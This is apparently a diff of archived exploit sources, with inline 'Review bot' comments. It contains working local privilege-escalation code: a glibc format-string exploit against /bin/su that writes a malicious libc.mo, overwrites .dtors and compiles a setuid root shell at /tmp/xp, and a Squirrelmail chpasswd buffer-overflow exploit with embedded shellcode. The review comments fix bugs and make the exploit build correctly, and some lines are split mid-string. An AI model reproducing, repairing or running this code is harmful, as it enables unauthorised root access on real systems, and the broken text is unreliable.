"\x04\x8d\x47\x1b\x89\x47\x08\x31\xc0\x89"
|
||||
"\x47\x0c\x8d\x0f\x8d\x57\x0c\x83\xc0\x0b"
|
||||
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8"
|
||||
"\xcb\xff\xff\xff\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x2f\x62\x69\x6e\x2f\x73\x68\x30\x2d\x63"
|
||||
"\x30"
|
||||
"chown root /tmp/xp;chmod 4777 /tmp/xp";
|
||||
|
||||
char *LC_MESSAGES = \"/tmp/LC_MESSAGES\";
|
||||
char *LC_MESSAGES = "/tmp/LC_MESSAGES";
|
||||
int NOP_LEN = 12000;
|
||||
|
||||
char *msgfmt = \"/usr/bin/msgfmt\";
|
||||
char *objdump = \"/usr/bin/objdump\";
|
||||
char *msgfmt = "/usr/bin/msgfmt";
|
||||
char *objdump = "/usr/bin/objdump";
|
||||
char *language = NULL;
|
||||
|
||||
char *make_format_string(unsigned long, int, int);
|
||||
|
@ -52,149 +52,149 @@ int main(int argc, char **argv)
|
|||
char randfile[1024];
|
||||
char *args2[2], opt;
|
||||
|
||||
printf(\"su exploit by XP <xp@xtreme-power.com>\\n\");
|
||||
printf(\"Enjoy!\\n\\n\");
|
||||
printf("su exploit by XP <xp@xtreme-power.com>\n");
|
||||
printf("Enjoy!\n\n");
|
||||
|
||||
while ((opt = getopt(argc, argv, \"o:n:m:O:e:l:\")) != EOF)
|
||||
while ((opt = getopt(argc, argv, "o:n:m:O:e:l:")) != EOF)
|
||||
switch(opt) {
|
||||
case \'o\':
|
||||
case 'o':
|
||||
offset = atoi(optarg);
|
||||
break;
|
||||
case \'n\':
|
||||
case 'n':
|
||||
NOP_LEN = atoi(optarg);
|
||||
break;
|
||||
case \'m\':
|
||||
case 'm':
|
||||
msgfmt = strdup(optarg);
|
||||
break;
|
||||
case \'O\':
|
||||
case 'O':
|
||||
objdump = strdup(optarg);
|
||||
break;
|
||||
case \'e\':
|
||||
sscanf(optarg, \"%i:%i\", &eat, &pad);
|
||||
case 'e':
|
||||
sscanf(optarg, "%i:%i", &eat, &pad);
|
||||
break;
|
||||
case \'l\':
|
||||
case 'l':
|
||||
language = (char*) malloc(40 + strlen(optarg));
|
||||
if (!language) {
|
||||
printf(\"malloc failed\\naborting\\n\");
|
||||
printf("malloc failed\naborting\n");
|
||||
exit(0);
|
||||
}
|
||||
memset(language, 0, 40 + strlen(optarg));
|
||||
sprintf(language, \"LANGUAGE=%s/../../../../../../tmp\", optarg);
|
||||
sprintf(language, "LANGUAGE=%s/../../../../../../tmp", optarg);
|
||||
break;
|
||||
default:
|
||||
exit(0);
|
||||
}
|
||||
|
||||
printf(\"Phase 1. Checking paths and write permisions\\n\");
|
||||
printf(\" Checking for %s...\", msgfmt);
|
||||
printf("Phase 1. Checking paths and write permisions\n");
|
||||
printf(" Checking for %s...", msgfmt);
|
||||
checkfor(msgfmt);
|
||||
printf(\" Checking for %s...\", objdump);
|
||||
printf(" Checking for %s...", objdump);
|
||||
checkfor(objdump);
|
||||
|
||||
printf(\" Checking write permisions on /tmp...\");
|
||||
if (stat(\"/tmp\", &st) < 0) {
|
||||
printf(\"failed. cannot stat /tmp\\naborting\\n\");
|
||||
printf(" Checking write permisions on /tmp...");
|
||||
if (stat("/tmp", &st) < 0) {
|
||||
printf("failed. cannot stat /tmp\naborting\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
if (!(st.st_mode & S_IWOTH)) {
|
||||
printf(\"failed. /tmp it\'s not +w\\naborting\\n\");
|
||||
printf("failed. /tmp it's not +w\naborting\n");
|
||||
exit(0);
|
||||
}
|
||||
printf(\"Ok\\n\");
|
||||
printf("Ok\n");
|
||||
fflush(stdout);
|
||||
|
||||
printf(\" Checking read permisions on /bin/su...\");
|
||||
if (stat(\"/bin/su\", &st) < 0) {
|
||||
printf(\"failed. cannot stat /bin/su\\naborting\\n\");
|
||||
printf(" Checking read permisions on /bin/su...");
|
||||
if (stat("/bin/su", &st) < 0) {
|
||||
printf("failed. cannot stat /bin/su\naborting\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
if (!(st.st_mode & S_IROTH)) {
|
||||
printf(\"failed. /bin/su it\'s not +r\\naborting\\n\");
|
||||
printf("failed. /bin/su it's not +r\naborting\n");
|
||||
exit(0);
|
||||
}
|
||||
printf(\"Ok\\n\");
|
||||
printf("Ok\n");
|
||||
fflush(stdout);
|
||||
|
||||
if (!language) {
|
||||
printf(\" Checking for a valid language...\");
|
||||
printf(" Checking for a valid language...");
|
||||
search_valid_language();
|
||||
printf(\"Ok\\n\");
|
||||
printf("Ok\n");
|
||||
}
|
||||
|
||||
printf(\" Checking that %s does not exist...\", LC_MESSAGES);
|
||||
printf(" Checking that %s does not exist...", LC_MESSAGES);
|
||||
if (stat(LC_MESSAGES, &st) >= 0) {
|
||||
printf(\"failed. %s exists\\naborting\\n\", LC_MESSAGES);
|
||||
printf("failed. %s exists\naborting\n", LC_MESSAGES);
|
||||
exit(0);
|
||||
}
|
||||
printf(\"Ok\\n\");
|
||||
printf("Ok\n");
|
||||
fflush(stdout);
|
||||
|
||||
printf(\"Phase 2. Calculating eat and pad values\\n \");
|
||||
printf("Phase 2. Calculating eat and pad values\n ");
|
||||
srand(time(NULL));
|
||||
|
||||
if (eat || pad) printf(\"skkiping, values set by user to eat = %i and
|
||||
pad = %i\\n\", eat, pad);
|
||||
if (eat || pad) printf("skkiping, values set by user to eat = %i and
|
||||
pad = %i\n", eat, pad);
|
||||
else {
|
||||
calculate_eat_space(&eat, &pad);
|
||||
printf(\"done\\n eat = %i and pad = %i\\n\", eat, pad);
|
||||
printf("done\n eat = %i and pad = %i\n", eat, pad);
|
||||
}
|
||||
fflush(stdout);
|
||||
|
||||
sh_addr -= offset;
|
||||
|
||||
printf(\"Phase 3. Creating evil libc.mo and setting enviroment
|
||||
vars\\n\");
|
||||
printf("Phase 3. Creating evil libc.mo and setting enviroment
|
||||
vars\n");
|
||||
fflush(stdout);
|
||||
|
||||
mkdir(LC_MESSAGES, 0755);
|
||||
chdir(LC_MESSAGES);
|
||||
|
||||
f = fopen(\"libc.po\", \"w+\");
|
||||
f = fopen("libc.po", "w+");
|
||||
if (!f) {
|
||||
perror(\"fopen()\");
|
||||
perror("fopen()");
|
||||
exit(0);
|
||||
}
|
||||
fprintf(f,\"msgid \\\"%%s: invalid option -- %%c\\\\n\\\"\\n\");
|
||||
fprintf(f,\"msgstr \\\"%s\\\\n\\\"\", make_format_string(sh_addr, eat, 0));
|
||||
fprintf(f,"msgid \"%%s: invalid option -- %%c\\n\"\n");
|
||||
fprintf(f,"msgstr \"%s\\n\"", make_format_string(sh_addr, eat, 0));
|
||||
fclose(f);
|
||||
|
||||
sprintf(execbuf, \"%s libc.po -o libc.mo; chmod 777 libc.mo\", msgfmt);
|
||||
sprintf(execbuf, "%s libc.po -o libc.mo; chmod 777 libc.mo", msgfmt);
|
||||
system(execbuf);
|
||||
|
||||
nop_env = (char*) malloc(NOP_LEN + strlen(shellcode) + 1);
|
||||
if (!nop_env) {
|
||||
printf(\"malloc failed\\naborting\\n\");
|
||||
printf("malloc failed\naborting\n");
|
||||
exit(0);
|
||||
}
|
||||
memset(nop_env, 0x90, NOP_LEN + strlen(shellcode) + 1);
|
||||
sprintf(&nop_env[NOP_LEN], \"%s\", shellcode);
|
||||
sprintf(&nop_env[NOP_LEN], "%s", shellcode);
|
||||
|
||||
env[0] = language;
|
||||
env[1] = NULL;
|
||||
|
||||
printf(\"Phase 4. Getting address of .dtors section of /bin/su\\n \");
|
||||
printf("Phase 4. Getting address of .dtors section of /bin/su\n ");
|
||||
dtors_addr = get_dtors_addr();
|
||||
printf(\"done\\n .dtors is at 0x%08x\\n\", dtors_addr);
|
||||
printf("done\n .dtors is at 0x%08x\n", dtors_addr);
|
||||
fflush(stdout);
|
||||
|
||||
printf(\"Phase 5. Compiling suid shell\\n\");
|
||||
printf("Phase 5. Compiling suid shell\n");
|
||||
fflush(stdout);
|
||||
|
||||
make_suid_shell();
|
||||
|
||||
printf(\"Phase 6. Executing /bin/su\\n\");
|
||||
printf("Phase 6. Executing /bin/su\n");
|
||||
fflush(stdout);
|
||||
|
||||
args[0] = \"/bin/su\";
|
||||
args[1] = \"-\";
|
||||
args[0] = "/bin/su";
|
||||
args[1] = "-";
|
||||
args[2] = make_ret_str(dtors_addr, pad);
|
||||
args[3] = \"-w\";
|
||||
args[3] = "-w";
|
||||
args[4] = nop_env;
|
||||
args[5] = NULL;
|
||||
|
||||
sprintf(randfile, \"/tmp/tmprand%i\", rand());
|
||||
sprintf(randfile, "/tmp/tmprand%i", rand());
|
||||
|
||||
if (!(pid = fork())) {
|
||||
close(1);
|
||||
|
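Review bot: The `printf("skkiping, values set by user to eat = %i and` / `pad = %i\n", eat, pad);` pair and the Phase 3 `printf("Phase 3. Creating evil libc.mo and setting enviroment` / `vars\n");` pair are stored as two physical lines each, not merely wrapped for display: the next hunk header reads `@ -203,11 +203,11 @@ vars\\n\");`, which git only emits when a line of the file begins with `vars`. A newline inside a C string literal does not compile, so the archived source stays broken after this quote unescape; rejoining those lines belongs in the same cleanup. Separately, every failure branch in this hunk ends in `exit(0)` (cannot stat /tmp, malloc failed, unknown option), so a caller or harness sees success on every abort; `exit(EXIT_FAILURE)` is the conventional choice.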
@ -203,11 +203,11 @@ vars\\n\");
|
|||
dup2(fd, 1);
|
||||
dup2(fd, 2);
|
||||
execve(args[0], args, env);
|
||||
printf(\"failed to exec /bin/su\\n\"); exit(0);
|
||||
printf("failed to exec /bin/su\n"); exit(0);
|
||||
}
|
||||
|
||||
if (pid < 0) {
|
||||
perror(\"fork()\");
|
||||
perror("fork()");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
|
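Review bot: In the child branch, `execve(args[0], args, env);` is followed by `printf("failed to exec /bin/su\n"); exit(0);`, so a failed exec exits with status 0 and the parent cannot distinguish it from a normal run; stdout was also redirected by the preceding `dup2(fd, 1)`, so the message lands in the temp file rather than on the terminal. `_exit(EXIT_FAILURE)` after a failed exec in a forked child is the usual pattern (it also avoids flushing the parent's duplicated stdio buffers twice).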
@ -215,32 +215,32 @@ vars\\n\");
|
|||
|
||||
unlink(randfile);
|
||||
|
||||
stat(\"/tmp/xp\", &st);
|
||||
stat("/tmp/xp", &st);
|
||||
if (!(S_ISUID & st.st_mode)) {
|
||||
printf(\"failed to put mode 4777 to /tmp/xp\\naborting\\n\");
|
||||
printf("failed to put mode 4777 to /tmp/xp\naborting\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
printf(\" - Entering rootshell ;-) -\\n\");
|
||||
printf(" - Entering rootshell ;-) -\n");
|
||||
fflush(stdout);
|
||||
|
||||
if (!(pid = fork())) {
|
||||
args2[0] = \"/tmp/xp\";
|
||||
args2[0] = "/tmp/xp";
|
||||
args2[1] = NULL;
|
||||
execve(args2[0], args2, NULL);
|
||||
printf(\"failed to exec /tmp/xp\\n\");
|
||||
printf("failed to exec /tmp/xp\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
if (pid < 0) {
|
||||
perror(\"fork()\");
|
||||
perror("fork()");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
waitpid(pid, &c, 0);
|
||||
|
||||
printf(\"Phase 7. Cleaning enviroment\\n\");
|
||||
sprintf(execbuf, \"rm -rf %s /tmp/xp\", LC_MESSAGES);
|
||||
printf("Phase 7. Cleaning enviroment\n");
|
||||
sprintf(execbuf, "rm -rf %s /tmp/xp", LC_MESSAGES);
|
||||
system(execbuf);
|
||||
}
|
||||
|
||||
|
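Review bot: The return value of `stat("/tmp/xp", &st);` is ignored, and `st` was last filled by the Phase 1 `stat("/bin/su", &st)`, whose mode carries the setuid bit. If /tmp/xp was never created, `if (!(S_ISUID & st.st_mode))` therefore passes on stale data and the code proceeds to `execve(args2[0], args2, NULL);`, which fails with the misleading "failed to exec /tmp/xp" message instead of the intended "failed to put mode 4777" diagnosis. Check the stat result before inspecting `st.st_mode`. For anyone triaging a host, the fixed artifacts in this hunk (`/tmp/xp` and the `rm -rf` of the locale directory run through `system(execbuf)`) are the observable traces of this tool.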
@ -254,17 +254,17 @@ char *make_format_string(unsigned long sh_addr, int eat, int test)
|
|||
|
||||
memset(ret, 0, 0xffff);
|
||||
|
||||
for (c = 0; c < eat; c++) strcat(ret, \"%8x\");
|
||||
for (c = 0; c < eat; c++) strcat(ret, "%8x");
|
||||
|
||||
waste = 8 * eat;
|
||||
|
||||
hi = (sh_addr & 0xffff0000) >> 16;
|
||||
lo = (sh_addr & 0xffff) - hi;
|
||||
if (!test) {
|
||||
sprintf(&ret[strlen(ret)], \"%%0%ux%%hn\", hi-waste);
|
||||
sprintf(&ret[strlen(ret)], \"%%0%ux%%hn\", lo);
|
||||
sprintf(&ret[strlen(ret)], "%%0%ux%%hn", hi-waste);
|
||||
sprintf(&ret[strlen(ret)], "%%0%ux%%hn", lo);
|
||||
}
|
||||
else strcat(ret, \"%8x *0x%08x* %8x *0x%08x*\");
|
||||
else strcat(ret, "%8x *0x%08x* %8x *0x%08x*");
|
||||
return ret;
|
||||
}
|
||||
|
||||
|
@ -276,22 +276,22 @@ unsigned long get_dtors_addr()
|
|||
FILE *f;
|
||||
unsigned long ret = 0, tmp1, tmp2, tmp3;
|
||||
|
||||
sprintf(file, \"/tmp/tmprand%i\", rand());
|
||||
sprintf(exec_buf, \"%s -h /bin/su > %s\", objdump, file);
|
||||
sprintf(file, "/tmp/tmprand%i", rand());
|
||||
sprintf(exec_buf, "%s -h /bin/su > %s", objdump, file);
|
||||
|
||||
system(exec_buf);
|
||||
|
||||
f = fopen(file, \"r\");
|
||||
f = fopen(file, "r");
|
||||
if (!f) {
|
||||
perror(\"fopen()\");
|
||||
perror("fopen()");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
while (!feof(f)) {
|
||||
fgets(buf, 1024, f);
|
||||
sscanf(buf, \" %i .%s %x %x \\n\", &tmp1, sect, &tmp2, &tmp3);
|
||||
printf(\".\"); fflush(stdout);
|
||||
if (strcmp(sect, \"dtors\")) continue;
|
||||
sscanf(buf, " %i .%s %x %x \n", &tmp1, sect, &tmp2, &tmp3);
|
||||
printf("."); fflush(stdout);
|
||||
if (strcmp(sect, "dtors")) continue;
|
||||
ret = tmp3;
|
||||
break;
|
||||
}
|
||||
|
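Review bot: `while (!feof(f))` around an unchecked `fgets(buf, 1024, f);` processes `buf` one extra time at EOF with stale contents; loop on `while (fgets(buf, sizeof buf, f) != NULL)` instead. In `sscanf(buf, " %i .%s %x %x \n", &tmp1, sect, &tmp2, &tmp3);` the `%i`/`%x` conversions store `int`/`unsigned int` through pointers to `unsigned long` (declared two lines above), which was harmless on the 32-bit targets this file was written for but is undefined in general (`%li`/`%lx`), and the `%s` into `sect` has no width limit. Also note the `objdump -h /bin/su` output goes to `/tmp/tmprand%i` with a `rand()`-derived name: a predictable temp file in a shared directory, the classic /tmp symlink hazard, which `mkstemp()` avoids.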
@ -299,7 +299,7 @@ unsigned long get_dtors_addr()
|
|||
unlink(file);
|
||||
|
||||
if (!ret) {
|
||||
printf(\"error getting the address of .dtors\\naborting\");
|
||||
printf("error getting the address of .dtors\naborting");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
|
@ -344,41 +344,41 @@ void calculate_eat_space(int *eatr, int *padr)
|
|||
char *readbuf = NULL, *token;
|
||||
unsigned long t1, t2;
|
||||
|
||||
tmpfile[0] = \'\\0\';
|
||||
tmpfile[0] = '\0';
|
||||
|
||||
nop_env = (char*) malloc(NOP_LEN + strlen(shellcode) + 1);
|
||||
if (!nop_env) {
|
||||
printf(\"malloc failed\\naborting\\n\");
|
||||
printf("malloc failed\naborting\n");
|
||||
exit(0);
|
||||
}
|
||||
memset(nop_env, 0x90, NOP_LEN + strlen(shellcode) + 1);
|
||||
sprintf(&nop_env[NOP_LEN], \"%s\", shellcode);
|
||||
sprintf(&nop_env[NOP_LEN], "%s", shellcode);
|
||||
|
||||
for (eat = 50; eat < 200; eat++) {
|
||||
for (pad = 0; pad < 4; pad++) {
|
||||
|
||||
if (tmpfile[0]) unlink(tmpfile);
|
||||
|
||||
chdir(\"/\");
|
||||
chdir("/");
|
||||
|
||||
sprintf(execbuf, \"rm -rf %s\", LC_MESSAGES);
|
||||
sprintf(execbuf, "rm -rf %s", LC_MESSAGES);
|
||||
system(execbuf);
|
||||
|
||||
mkdir(LC_MESSAGES, 0755);
|
||||
chdir(LC_MESSAGES);
|
||||
|
||||
f = fopen(\"libc.po\", \"w+\");
|
||||
f = fopen("libc.po", "w+");
|
||||
if (!f) {
|
||||
perror(\"fopen()\");
|
||||
perror("fopen()");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
fprintf(f,\"msgid \\\"%%s: invalid option -- %%c\\\\n\\\"\\n\");
|
||||
fprintf(f,\"msgstr \\\"%s\\\\n\\\"\", make_format_string(0xbfffffbb, eat,
|
||||
fprintf(f,"msgid \"%%s: invalid option -- %%c\\n\"\n");
|
||||
fprintf(f,"msgstr \"%s\\n\"", make_format_string(0xbfffffbb, eat,
|
||||
1));
|
||||
fclose(f);
|
||||
|
||||
sprintf(execbuf, \"chmod 777 libc.po; %s libc.po -o libc.mo\",
|
||||
sprintf(execbuf, "chmod 777 libc.po; %s libc.po -o libc.mo",
|
||||
msgfmt);
|
||||
system(execbuf);
|
||||
|
||||
|
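Review bot: The double backslash in the restored `fprintf(f,"msgid \"%%s: invalid option -- %%c\\n\"\n");` is correct and must not be reduced further: the .po file that msgfmt reads has to contain the two characters `\` and `n` inside the quoted msgid, so the C source needs `\\n` there, while the trailing `\n` outside the quotes is a real line terminator. The old `\\\"%%s: invalid option -- %%c\\\\n\\\"\\n` was the CSV-escaped form of exactly that, three layers deep, and this hunk unescapes it by exactly one layer, which is the right result. The same holds for the identical pair in the first hunk of this file.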
@ -396,10 +396,10 @@ dup2(fds[1], 2);
|
|||
env[0] = language;
|
||||
env[1] = NULL;
|
||||
|
||||
args[0] = \"/bin/su\";
|
||||
args[1] = \"-\";
|
||||
args[0] = "/bin/su";
|
||||
args[1] = "-";
|
||||
args[2] = make_ret_str(test_value, pad);
|
||||
args[3] = \"-w\";
|
||||
args[3] = "-w";
|
||||
args[4] = nop_env;
|
||||
args[5] = NULL;
|
||||
|
||||
|
@ -407,16 +407,16 @@ execve(args[0], args, env);
|
|||
}
|
||||
|
||||
if (pid < 0) {
|
||||
perror(\"fork()\");
|
||||
perror("fork()");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
close(fds[1]);
|
||||
|
||||
sprintf(tmpfile, \"/tmp/tmprand%i\", rand());
|
||||
sprintf(tmpfile, "/tmp/tmprand%i", rand());
|
||||
tmpfd = open(tmpfile, O_RDWR | O_CREAT);
|
||||
if (tmpfd < 0) {
|
||||
perror(\"open()\");
|
||||
perror("open()");
|
||||
exit(0);
|
||||
}
|
||||
while ((l = read(fds[0], buf, 1024)) > 0)
|
||||
|
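Review bot: `tmpfd = open(tmpfile, O_RDWR | O_CREAT);` omits the mode argument that `O_CREAT` requires, so the new file's permission bits come from whatever happens to sit in the variadic slot (undefined behaviour, which the following hunk's `chmod(tmpfile, 0777)` then papers over). Pass an explicit mode such as `open(tmpfile, O_RDWR | O_CREAT, 0600)`; better, since `sprintf(tmpfile, "/tmp/tmprand%i", rand());` yields a predictable name, use `mkstemp()` to get a safe name and the descriptor in one call.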
@ -429,16 +429,16 @@ write(tmpfd, buf, l);
|
|||
|
||||
chmod(tmpfile, 0777);
|
||||
|
||||
f = fopen(tmpfile, \"r\");
|
||||
f = fopen(tmpfile, "r");
|
||||
if (!f) {
|
||||
perror(\"fopen()\");
|
||||
perror("fopen()");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
if (readbuf) free(readbuf);
|
||||
readbuf = (char*) malloc(st.st_size);
|
||||
if (!readbuf) {
|
||||
printf(\"malloc failed\\naborting\\n\");
|
||||
printf("malloc failed\naborting\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
|
@ -447,15 +447,15 @@ exit(0);
|
|||
fread(readbuf, 1, st.st_size, f);
|
||||
fclose(f);
|
||||
|
||||
token = strtok(readbuf, \"*\");
|
||||
token = strtok(readbuf, "*");
|
||||
if (!token) continue;
|
||||
token = strtok(NULL, \"*\");
|
||||
token = strtok(NULL, "*");
|
||||
if (!token) continue;
|
||||
|
||||
t1 = strtoul(token, NULL, 16);
|
||||
token = strtok(NULL, \"*\");
|
||||
token = strtok(NULL, "*");
|
||||
if (!token) continue;
|
||||
token = strtok(NULL, \"*\");
|
||||
token = strtok(NULL, "*");
|
||||
if (!token) continue;
|
||||
t2 = strtoul(token, NULL, 16);
|
||||
|
||||
|
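Review bot: `fread(readbuf, 1, st.st_size, f);` fills `readbuf` completely (the preceding hunk allocates it with exactly `malloc(st.st_size)`) and never writes a terminating NUL, yet `token = strtok(readbuf, "*");` then scans it as a C string, so strtok reads past the allocation whenever the file does not end in `*`. Allocate `st.st_size + 1`, check the `fread` return value, and set `readbuf[n] = '\0'` before tokenising; `strtoul(token, NULL, 16)` should likewise get an end pointer so a non-hex token is noticed rather than silently parsed as 0.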
@ -463,7 +463,7 @@ exit(0);
|
|||
if (t1 == (test_value+2)) {
|
||||
*eatr = eat;
|
||||
*padr = pad;
|
||||
sprintf(execbuf, \"rm -rf %s\", LC_MESSAGES);
|
||||
sprintf(execbuf, "rm -rf %s", LC_MESSAGES);
|
||||
system(execbuf);
|
||||
if (tmpfile[0]) unlink(tmpfile);
|
||||
return;
|
||||
|
@ -471,16 +471,16 @@ if (t1 == (test_value+2)) {
|
|||
|
||||
// sleep(10);
|
||||
}
|
||||
printf(\".\");
|
||||
printf(".");
|
||||
fflush(stdout);
|
||||
}
|
||||
|
||||
if (tmpfile[0]) unlink(tmpfile);
|
||||
sprintf(execbuf, \"rm -rf %s\", LC_MESSAGES);
|
||||
sprintf(execbuf, "rm -rf %s", LC_MESSAGES);
|
||||
system(execbuf);
|
||||
|
||||
printf(\"failed to calculate eat and pad values. glibc patched or
|
||||
invalid language?\\naborting\\n\");
|
||||
printf("failed to calculate eat and pad values. glibc patched or
|
||||
invalid language?\naborting\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
|
@ -489,11 +489,11 @@ void checkfor(char *p)
|
|||
int fd;
|
||||
fd = open(p, O_RDONLY);
|
||||
if (fd < 0) {
|
||||
printf(\"failed\\naborting\\n\");
|
||||
printf("failed\naborting\n");
|
||||
exit(0);
|
||||
}
|
||||
close(fd);
|
||||
printf(\"Ok\\n\");
|
||||
printf("Ok\n");
|
||||
fflush(stdout);
|
||||
}
|
||||
|
||||
|
@ -502,30 +502,30 @@ void make_suid_shell()
|
|||
FILE *f;
|
||||
char execbuf[1024];
|
||||
|
||||
f = fopen(\"/tmp/kidd0.c\", \"w\");
|
||||
f = fopen("/tmp/kidd0.c", "w");
|
||||
if (!f) {
|
||||
printf(\" failed to create /tmp/kidd0.c\\naborting\\n\");
|
||||
printf(" failed to create /tmp/kidd0.c\naborting\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
fprintf(f, \"int main() { setuid(0); setgid(0); system(\\\"/bin/sh\\\");
|
||||
}\");
|
||||
fprintf(f, "int main() { setuid(0); setgid(0); system(\"/bin/sh\");
|
||||
}");
|
||||
fclose(f);
|
||||
|
||||
sprintf(execbuf, \"gcc /tmp/kidd0.c -o /tmp/xp\");
|
||||
sprintf(execbuf, "gcc /tmp/kidd0.c -o /tmp/xp");
|
||||
system(execbuf);
|
||||
|
||||
sprintf(execbuf, \"rm -f /tmp/kidd0.c\");
|
||||
sprintf(execbuf, "rm -f /tmp/kidd0.c");
|
||||
system(execbuf);
|
||||
|
||||
f = fopen(\"/tmp/xp\", \"r\");
|
||||
f = fopen("/tmp/xp", "r");
|
||||
if (!f) {
|
||||
printf(\" failed to compile /tmp/kidd0.c\\naborting\\n\");
|
||||
printf(" failed to compile /tmp/kidd0.c\naborting\n");
|
||||
exit(0);
|
||||
}
|
||||
fclose(f);
|
||||
|
||||
printf(\" /tmp/xp created Ok\\n\");
|
||||
printf(" /tmp/xp created Ok\n");
|
||||
fflush(stdout);
|
||||
}
|
||||
|
||||
|
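Review bot: The only success check after `sprintf(execbuf, "gcc /tmp/kidd0.c -o /tmp/xp"); system(execbuf);` is `f = fopen("/tmp/xp", "r");`, which proves a readable file of that name exists, not that the compile just succeeded; with a fixed name in a world-writable directory, a stale or pre-existing `/tmp/xp` passes. Checking the `system()` return status (or building inside a `mkdtemp()` directory) is the robust version. `fprintf(f, "int main() { setuid(0); setgid(0); system(\"/bin/sh\");` / `}");` also looks like another string literal split across physical lines; verify against the stored file. From a detection standpoint, the fixed paths `/tmp/kidd0.c` and `/tmp/xp` and an unprivileged `gcc` invocation writing into /tmp are the artifacts to watch for.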
@ -534,30 +534,30 @@ void search_valid_language()
|
|||
DIR *locale;
|
||||
struct dirent *dentry;
|
||||
|
||||
locale = opendir(\"/usr/share/locale\");
|
||||
locale = opendir("/usr/share/locale");
|
||||
if (!locale) {
|
||||
perror(\"failed to opendir /usr/share/locale\");
|
||||
printf(\"aborting\\n\");
|
||||
perror("failed to opendir /usr/share/locale");
|
||||
printf("aborting\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
while (dentry = readdir(locale)) {
|
||||
|
||||
if (!strchr(dentry->d_name, \'_\')) continue;
|
||||
if (!strchr(dentry->d_name, '_')) continue;
|
||||
|
||||
language = (char*) malloc(40 + strlen(dentry->d_name));
|
||||
if (!language) {
|
||||
printf(\"malloc failed\\naborting\\n\");
|
||||
printf("malloc failed\naborting\n");
|
||||
exit(0);
|
||||
}
|
||||
memset(language, 0, 40 + strlen(dentry->d_name));
|
||||
sprintf(language, \"LANGUAGE=%s/../../../../../../tmp\",dentry->d_name);
|
||||
sprintf(language, "LANGUAGE=%s/../../../../../../tmp",dentry->d_name);
|
||||
closedir(locale);
|
||||
printf(\" [using %s] \", dentry->d_name);
|
||||
printf(" [using %s] ", dentry->d_name);
|
||||
return;
|
||||
}
|
||||
|
||||
printf(\"failed to find a valid language\\naborting\\n\");
|
||||
printf("failed to find a valid language\naborting\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
|
|
|
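Review bot: `while (dentry = readdir(locale)) {` uses an assignment as the loop condition; write it as `while ((dentry = readdir(locale)) != NULL)` so the intent is explicit and compilers stop warning about it. The size budget behind `language = (char*) malloc(40 + strlen(dentry->d_name));` is not stated anywhere; a one-line comment giving the fixed length of the `"LANGUAGE=%s/../../../../../../tmp"` template would let the next reader confirm it without recounting. The unescaping of `'_'` and of the string literals in this hunk is correct.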
@ -15,10 +15,10 @@
|
|||
#include <stdlib.h>
|
||||
|
||||
char shellcode[]=
|
||||
\"\\x31\\xc0\\xb0\\x46\\x31\\xdb\\x31\\xc9\\xcd\\x80\\xeb\\x16\\x5b\\x31\\xc0\"
|
||||
\"\\x88\\x43\\x07\\x89\\x5b\\x08\\x89\\x43\\x0c\\xb0\\x0b\\x8d\\x4b\\x08\\x8d\"
|
||||
\"\\x53\\x0c\\xcd\\x80\\xe8\\xe5\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\"
|
||||
\"\\x68\";
|
||||
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
|
||||
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
|
||||
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
|
||||
"\x68";
|
||||
|
||||
int main(int argc, char *argv[])
|
||||
{
|
||||
|
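Review bot: The unescape of the shellcode array here is right: `\"\\x31\\xc0\\xb0\\x46...\"` becomes `"\x31\xc0\xb0\x46..."`, C hex escapes with a single backslash, which is what the compiler needs. Compare the other chpasswd exploit later in this commit, where the stored copy had already lost its backslashes entirely and this quote-only fix cannot recover them; this file is the reference for what that one should look like.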
@ -29,16 +29,16 @@ char *buffer, *ptr;
|
|||
|
||||
buffer = malloc(200);
|
||||
|
||||
printf(\"\\n*** Squirremail chpasswd local root exploit by 0x3142@hushmail.com ***\\n\\n\");
|
||||
printf("\n*** Squirremail chpasswd local root exploit by 0x3142@hushmail.com ***\n\n");
|
||||
|
||||
if(argc != 2) {
|
||||
printf(\"Usage: %s <path-to-chpasswd>\\n\\n\",argv[0]);
|
||||
printf("Usage: %s <path-to-chpasswd>\n\n",argv[0]);
|
||||
exit(0);
|
||||
}
|
||||
|
||||
ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]);
|
||||
|
||||
// printf(\"Using ret = 0x%x\\n\\n\", ret);
|
||||
// printf("Using ret = 0x%x\n\n", ret);
|
||||
|
||||
ptr = buffer;
|
||||
addr_ptr = (long *) ptr;
|
||||
|
@ -49,7 +49,7 @@ for(i=0; i < 200; i+=4)
|
|||
|
||||
buffer[200-1] = 0;
|
||||
|
||||
execle(argv[1], \"chpasswd\", buffer, \"0x314\", \"m0s\", 0, env);
|
||||
execle(argv[1], "chpasswd", buffer, "0x314", "m0s", 0, env);
|
||||
|
||||
free(buffer);
|
||||
|
||||
|
|
|
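Review bot: `execle(argv[1], "chpasswd", buffer, "0x314", "m0s", 0, env);` terminates the argument list with the integer literal `0` rather than a null pointer; that works on ILP32 but in a variadic call on LP64 only 32 bits of the slot are guaranteed to be written, so `(char *)NULL` is the portable form. The `free(buffer);` after it is reached only when exec fails, and nothing reports that failure; a `perror("execle")` there would make it visible.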
@ -9,25 +9,25 @@
|
|||
# Cdrecord 2.0 (i586-mandrake-linux-gnu)
|
||||
#
|
||||
